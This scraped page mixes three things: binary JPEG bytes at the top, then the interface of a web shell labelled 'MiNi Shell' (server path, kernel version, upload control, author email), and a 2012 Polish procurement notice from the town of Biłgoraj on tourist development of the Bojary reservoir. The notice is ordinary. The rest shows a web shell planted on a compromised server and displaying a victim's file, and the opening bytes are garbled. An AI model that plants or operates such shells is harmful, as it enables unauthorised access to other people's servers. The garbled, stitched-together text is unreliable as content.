JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120410/81205-N-2012.html

<p class="kh_header"><b>Biłgoraj: Przedmiotem zamówienia jest realizacja projektu pn: 
Kompleksowe zagospodarowanie turystyczne zalewu Bojary w Biłgoraju
 w formule zaprojektuj i wybuduj</b><br>
<b>Numer ogłoszenia: 81205 - 2012; data zamieszczenia: 10.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Biłgoraj , Plac  Wolności 16, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6869600, faks 84 6869665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgoraj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest realizacja projektu pn: 
Kompleksowe zagospodarowanie turystyczne zalewu Bojary w Biłgoraju
 w formule zaprojektuj i wybuduj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie obejmuje sporządzenie dokumentacji projektowej, w oparciu o Program   
   Funkcjonalno Użytkowy w tym: 
         a) dokumentacji projektowej w stadium:
	Projektu  budowlanego  wszystkich branż  architektoniczna, konstrukcyjno-budowlana, wodno-melioracyjna, sanitarna, energetyczna, teleinformatyczna) wraz z  informacją dotyczącą bezpieczeństwa i ochrony zdrowia - 6 egz.
	Projektów wykonawczych wszystkich branż oraz innych, których konieczność opracowania może wyniknąć w trakcie projektowania - 4 egz.
	Przedmiarów robót z wyliczeniem ilości kosztorys ślepy - 2 egz.
	Specyfikacji technicznej wykonania i odbioru robót budowlanych dla zakresu robót objętego przedmiotem umowy - 2 egz.
Zapis całości opracowania na nośniku elektronicznym płyta CD - 2 egz. dokumentacja projektowa oraz STWiORB w formacie dwg, pdf, doc,
	Przedmiary i kosztorysy inwestorskie robót w formacie zuz i pdf. - płyta CD 2 egz.
	Wykonanie niezbędnych badań, pomiarów uzupełniających, aktualizacji warunków technicznych przyłączy.
b)wszelkich robót budowlanych oraz dostaw w zakresie podanym w programie
funkcjonalno-użytkowym, SIWZ, zgodnie z zatwierdzoną przez Zamawiającego dokumentacją projektową oraz obowiązującymi przepisami, zasadami wiedzy technicznej i sztuką budowlaną;
c)wszelkich niezbędnych prac z uwzględnieniem poniesienia wszelkich opłat
administracyjnych koniecznych do realizacji robót objętych zamówieniem;
d)dokumentacji powykonawczej wraz z instrukcją eksploatacyjną, założoną książką obiektu, opisami zabezpieczeń fizycznych sprzętu, terminami przeglądów i kontroli obowiązkowych, wykonanie przed odbiorem kontroli 5-letniej stanu technicznego dla wybudowanego obiektu potwierdzonej pozytywnym protokołem.
e)sprawowanie nadzoru autorskiego;
         f)uzyskanie wymaganych prawem polskim i dyrektywami UE decyzji administracyjnych, dla etapu projektowania i wykonywania robót budowlanych w tym m.innymi: aktualizacji postępowania o wydanie decyzji środowiskowej o ile będzie wymagane, aktualizacji postępowania o wydanie decyzji celu publicznego o ile będzie wymagane, decyzji pozwolenia na budowę, decyzji pozwolenia wodno-prawnego, decyzji pozwolenia na użytkowanie.
         Wykonawca przed złożeniem wniosku o pozwolenie na budowę uzyska pisemną akceptację Zamawiającego dla projektu budowlanego i wykonawczego.
UWAGA:
1.Wykonawca zapewni opracowanie dokumentacji projektowo- kosztorysowej z należytą starannościa, w sposób zgodny z wymogami ustaw, innymi przepisami i obowiązującymi Polskimi Normami przenoszącymi europejskie normy zharmonizowane oraz zasadami najnowszej wiedzy technicznej;
2. Opracowanie projektowe będące przedmiotem zamówienia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003r. (Dz.U. nr 120, poz.1133 z późn.zm.) w sprawie zakresu i formy projektu budowlanego, rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r.( Dz.U. nr 202,poz.2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych.
3. Wykonawca jest odpowiedzialny względem Zamawiającego za jakość dokumentacji oraz jej zgodność z przepisami techniczno-budowlanymi, aktualnymi normami, aprobatami. Zawierać będzie wymagane sprawdzenia rozwiązań a także opinie, uzgodnienia zgody i pozwolenia, oraz spis opracowań składających się na całość dokumentacji wraz z oświadczeniem o ich kompletności. Posiadać będzie ponadto oświadczenie Wykonawcy podpisane przez projektantów odpowiedzialnych za spełnienie tych wymagań.
4. Zamawiajacy wymaga, aby dokumentacja projektowa określała parametry techniczne i wymagania funkcjonalne zastosowanych wyrobów w celu zapewnienia konkurencyjności zgodnie z art.29 ust.1 ustawy P.z.p. w stosunku do opisanych w Programie Funkcjonalno Użytkowym. W przypadku odmiennego od uregulowanego w art.29 ust.1 , opisu przedmiotu zamówienia tj. poprzez wskazanie znaków towarowych, patentów lub pochodzenia należy podać warunki lub cechy równoważności jakie muszą być spełnione.

      2. Wykonanie robót budowlanych, dostaw, montażu urządzeń i wyposażenia
          obejmujących wszystkie branże w tym: 
    
      1.Zagospodarowanie terenu:
	Roboty nawierzchniowe chodniki, parkingi, ścieżka rowerowa, podjazd dla niepełnosprawnych, rampy, schody terenowe i inne,
	Nawiezienie piasku na teren plaży,
	Odtworzenie skarp grobli,
	Oświetlenie terenu -  lampy LED
	Wykonanie zieleni,
	Elementy małej architektury: pomost drewniany (taras widokowy), pomost drewniany przy budynkach OSiR, ogrodzenie, gambiony, stojaki na rowery, toaleta podwójna, przebieralnie, urządzenia zabawowe sprawnościowe z funkcją rekreacyjna i turystyczną, boisko do piłki nożnej plażowej wraz z infrastrukturą towarzyszącą, natryski, zjeżdżalnia, ławki, kosze, tablice informacyjne.
2.Przebudowa budynków OSiR.
	Budynek socjalno-sanitarny (moduł kontenerowy) wraz z kompletem instalacji, ogrzewanie elektryczne,
	Budynek magazynowy - wiata obudowana,
	Przyłącza wod-kan do budynków ,toalety, natrysków,
	Ogrodzenie systemowe.
      3.Branża hydrotechniczna.
	Przebudowa urządzeń wpusowo-spustowych wraz z przyczółkami,
	Rów opaskowy,
	Odmulenie i oczyszczenie czaszy zbiornika,
	Zabudowa wykreowanych skarp grobli - strona odwodna i odpowietrzna,
	Rekonstrukcja wału na odcinku słabego zagęszczenia.
      4.Branża teletechniczna.
	Monitoring wizyjny,
	System monitoringu przepływu ludności,
	Szerokopasmowy dostęp do Internetu,
	Infokioski,
	Infrastruktura informatyczna.
       5.Dostawy sprzętu pływającego.
       6. Sieci zewnętrzne wod-kan i energetyczne.
 
         Zakresy robót dostaw, montażu, urządzeń i wyposażenia i ich ilości zawiera Program 
         Funkcjonalno Użytkowy stanowiący zał. do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie zamówien uzupełniajacych o ktorych mowa w art 67 ust.1 pkt.6 ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.72.70-3, 71.00.00.00-8, 71.32.00.00-2, 71.32.70.00-6, 45.31.12.00-2, 45.23.31.65-5, 45.11.12.91-4, 34.97.10.00-4, 72.71.00.00-0, 35.12.17.00-5, 32.42.10.00-0, 45.31.23.30-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Obowiązuje wniesienie wadium. Wysokość wadium- 20 000,00 zł(dwadzieścia tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane w formule zaprojektuj i wybuduj, odpowiadające zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, przez które należy rozumieć roboty polegające na przebudowie lub budowie, modernizacji budowli hydrotechnicznych( zbiorników wodnych) wraz z ich zagospodarowaniem turystycznym, o wartości jednej z nich co najmniej 2 000 000,00 zł brutto - poparte dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Do sporządzenia wykazu robót można wykorzystać załączony do SIWZ wzór zał. Nr 5.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia, tj:
1) kierownik budowy - wymagania:
a) uprawnienia budowlane do kierowania robotami w specjalności budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
b) w opisie doświadczenia zawodowego wykazać się doświadczeniem w realizacji jako kierownik budowy minimum 2 zadań dotyczącego przebudowy, budowy lub modernizacji budowli hydrotechnicznych (zbiorników wodnych) wraz z ich zagospodarowaniem turystycznym, o wartości jednego z nich min. dwa miliony zł.
2) kierownik robót drogowych - wymagania:
a) uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
b) w opisie doświadczenia zawodowego wykazać się doświadczeniem w realizacji jako kierownik budowy lub kierownik robót drogowych minimum dwoma zadaniami dotyczącymi przebudowy lub budowy dróg.
3) kierownik robót branży sanitarnej - wymagania:
a) uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
b) w opisie doświadczenia zawodowego wykazać się kierowaniem: co najmniej dwoma zadaniami w zakresie budowy sieci kanalizacji deszczowej lub sanitarnej.
4) kierownik robót branży elektrycznej - wymagania:
a) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
b) w opisie doświadczenia zawodowego wykazać się kierowaniem co najmniej dwoma zadaniami w branży elektrycznej (w zakresie sieci).
5) kierownik robót telekomunikacyjnych - wymagania:
a) uprawnienia budowlane w specjalności telekomunikacyjnej do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów,
b) w opisie doświadczenia zawodowego wykazać się kierowaniem co najmniej dwoma zadaniami w branży telekomunikacyjnej. 
6) Zespołem projektantów, co najmniej po 1 osobie posiadających uprawnienia do projektowania we wszystkich specjalnościach wymaganych przedmiotem zamówienia.
a) w opisie doświadczenia zawodowego wykazać się wykonaniem przynajmniej dwóch zamówień na projekt budowlano-wykonawczy w zakresie , budowy, rozbudowy modernizacji budowli hydrotechnicznych (zbiorników wodnych) wraz z ich turystycznym zagospodarowaniem.
Do sporządzenia wykazu pkt . 1-6 można wykorzystać załączony do SIWZ wzór zał. Nr 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypelniony druk Formularza Ofertowego z załączoną tabelą elementów grup robót, dowód wniesienia wadium, parafowany projekt umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy, w następującym zakresie
 i okolicznościach:

3.1) zmiany terminu realizacji zamówienia: 
a) z powodu działania siły wyższej tj. niezwykłych, nagłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego - o czas nie dłuższy niż czas działania siły wyższej;
b) konieczności wykonania dodatkowych badań, ekspertyz, prac lub badań archeologicznych, powodujących konieczność wstrzymania robót objętych niniejszą umową - o czas niezbędny do wykonania dodatkowych czynnosci;
c) wstrzymania robót z powodu okoliczności wynikających ze strony Zamawiającego - o czas do ich ustąpienia;                                                                                                                                                                                                                                
d) konieczności wykonania innych zamierzeń inwestycyjnych na tym samym placu budowy kolidujących z zakresem robót realizowanych przedmiotową umową - o czas niezbędny na ich wykonanie. 
3.2) innych zmian w następujących sytuacjach: 
a) zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
b) zmiany wynagrodzenia brutto - w przypadku ustawowej zmiany podatku od towarów i usług VAT;
c) zmniejszenia zakresu rzeczowego robót i zmiany wynagrodzenia - jeżeli wystąpią obiektywnie uzasadnione okoliczności w tym ograniczenia finansowe Zamawiającego z przyczyn od niego niezależnych. (wyliczone w oparciu o dane i wskaźniki zawarte w zał. do formularza oferowego i kosztorys ofertowym który wybrany wykonawca złoży wraz z dokumentacją )  
d) zmiany sposobu spełniania świadczenia w tym zmian technologicznych spowodowanych następującymi okolicznościami:
- pojawienia się nowszej technologii wykonania zaprojektowanych robót, nowszej generacji 
  urządzeń, konieczności realizacji projektu przy zastosowaniu innych rozwiązań technicznych   
  lub materiałowych ze względu na zmiany obowiązującego prawa - na zasadzie
  zamienności. 
Warunkiem dokonania zmian o których mowa wyżej jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę. Wystąpienie którejkolwiek z wymienionych w pkt. 3.1; 3.2 okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bilgoraj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> urzad Miasta Biłgoraj
Plac Wolności 16
23-400 Biłgoraj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 09:00, miejsce: Urzad Miasta Biłgoraj
Plac Wolności 16
23-400 Biłgoraj
pokój nr 13(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z RPO Województwa Lubelskiego na lata 2007-2013. Oś priorytetowa VII kultura turystyka. Dzialanie 7.1. Kategoria III.Infrastruktura turystyki- projekty lokalne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com